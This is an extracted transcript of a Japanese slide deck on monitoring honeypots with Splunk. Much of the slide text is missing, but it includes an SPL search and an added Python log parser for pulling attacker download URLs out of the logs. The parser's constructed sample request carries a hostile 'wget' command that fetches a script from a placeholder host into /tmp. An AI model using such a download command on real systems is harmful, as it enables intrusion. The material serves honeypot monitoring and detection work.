
Honeypot monitoring with Splunk (Splunkによるハニーポット監視.pdf)

sec-chick
September 30, 2018

Transcript

  1. WHO AM I • sec-chick @one_sec_chick • … (WoW Honeypot, Honeytrap) … [remaining slide text not recoverable from the extraction]
  2. SPLUNK • Splunk … • IT … > http://www.intellilink.co.jp/pd/products/package/security/splunk.html
  3. 1. SSH … 2. Splunk … 3. Splunk … 4. … 5. … HEX … [slide text not recoverable from the extraction]
  4. 1. Docker 2. … 3. Splunk 4. Suricata
  5. DOCKER • … Docker … [slide text not recoverable from the extraction]
  6. … Docker … • … cron … Splunk • WoWHoneypot, Honeytrap … VPS Honeypot … Docker … [slide text not recoverable from the extraction]
  7. SPLUNK … • … Splunk … • … DECRYPT … → Grep … → … → … URL … → … VirusTotal … [slide text not recoverable from the extraction]
  8. WOWHONEYPOT (the `¥` glyphs in the extracted slide are how Japanese fonts render the backslash; written as `\` here)
     | rex field=_raw "\"(?<Method_wow>[^\s]+)\s(?<wow_path>[^\s]+)\s([^\s]+)\s([^\s]+)\s([^\s]+)\s(?<base64_wow>.*$)"
     | decrypt field="base64_wow" atob emit('base64_wow_decrypted')
     | eval decode=urldecode(base64_wow_decrypted)
     | rex field="decode" "wget.+(?<wget_wowhoneypot>https?://[\w/:\.\-]+?)\s"
     | rex field="decode" "curl.+(?<curl_wowhoneypot>https?://[\w/:\.\-]+?)\s"
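The SPL on this slide does three things: it pulls the request line and the trailing base64 column out of a WoWHoneypot access-log line, decodes it (the decrypt app's `atob`, then `urldecode`), and extracts the URL that follows `wget`/`curl` so it can be checked against VirusTotal as slide 7 sketches. The same pipeline as a standalone Python parser, added here as an example that is not part of the deck nor of WoWHoneypot itself: the log-line layout it assumes (`[time] src_ip dst_host:port "METHOD PATH PROTO" status rule base64`) is inferred from the slide's regex, and the sample line is constructed with documentation addresses. It also handles the failure case the SPL silently skips, a last column that is not valid base64.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Optional
from urllib.parse import unquote_plus

# Mirrors the slide's rex: a literal quote, the method, the path, three
# unnamed columns (protocol + closing quote, status, matched rule) and then
# the base64-encoded raw request up to end of line. Assumed layout.
LINE_RE = re.compile(r'"(?P<method>\S+)\s(?P<path>\S+)\s\S+\s\S+\s\S+\s(?P<b64>.*)$')

# Same idea as the slide's wget/curl rex: the first http(s) URL after the tool name.
URL_RE = re.compile(r"(?P<tool>wget|curl)\b.*?(?P<url>https?://[\w/:.\-]+)")


@dataclass
class WowEvent:
    method: str
    path: str
    decoded_request: str
    urls: List[str] = field(default_factory=list)


def parse_wow_line(line: str) -> Optional[WowEvent]:
    """Parse one access-log line; return None if it does not match or the
    base64 column is malformed (binascii.Error is a ValueError subclass)."""
    m = LINE_RE.search(line)
    if m is None:
        return None
    try:
        raw = base64.b64decode(m.group("b64"), validate=True).decode("utf-8", "replace")
    except ValueError:
        return None
    # Splunk's urldecode() equivalent; unquote_plus also turns '+' into spaces,
    # which is what form-encoded command payloads need.
    decoded = unquote_plus(raw)
    urls = [u.group("url") for u in URL_RE.finditer(decoded)]
    return WowEvent(m.group("method"), m.group("path"), decoded, urls)


def collect_download_urls(lines: Iterable[str]) -> Dict[str, int]:
    """Count every wget/curl URL seen across a batch of lines; the keys are
    the candidates a reputation lookup (slide 7's VirusTotal step) would take."""
    counts: Dict[str, int] = {}
    for line in lines:
        ev = parse_wow_line(line)
        if ev is None:
            continue
        for url in ev.urls:
            counts[url] = counts.get(url, 0) + 1
    return counts


# Constructed sample (not a real capture): a form-encoded body carrying a
# download command, logged the way the slide's regex expects.
SAMPLE_REQUEST = (
    "POST /cgi-bin/setup.cgi HTTP/1.1\r\n"
    "Host: 198.51.100.10\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "cmd=wget+http%3A%2F%2F203.0.113.5%2Fdrop%2Fsample.sh+-O+%2Ftmp%2Fs"
)
SAMPLE_LINE = (
    '[2018-09-30 12:34:56+0900] 192.0.2.7 198.51.100.10:8080 '
    '"POST /cgi-bin/setup.cgi HTTP/1.1" 200 default '
    + base64.b64encode(SAMPLE_REQUEST.encode()).decode()
)

if __name__ == "__main__":
    ev = parse_wow_line(SAMPLE_LINE)
    print(ev.method, ev.path, ev.urls)
    print(collect_download_urls([SAMPLE_LINE]))
```

The URL character class is copied from the slide, so a URL containing `?`, `&` or `=` is cut at that character, exactly as the Splunk search would cut it; widen the class if the honeypot starts seeing query strings in its download commands.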
  9. SURICATA … • Grep … • … → … • Suricata … [remaining slide text not recoverable from the extraction]
  10. … • @Sec_S_Owl • @cactus_pots • @SugitaMuchi • @soji256 • @morihi_soc • … Twitter … • … Slack … • http://goo.gl/8bLkZA
  11. … • Splunk … [slide text not recoverable from the extraction]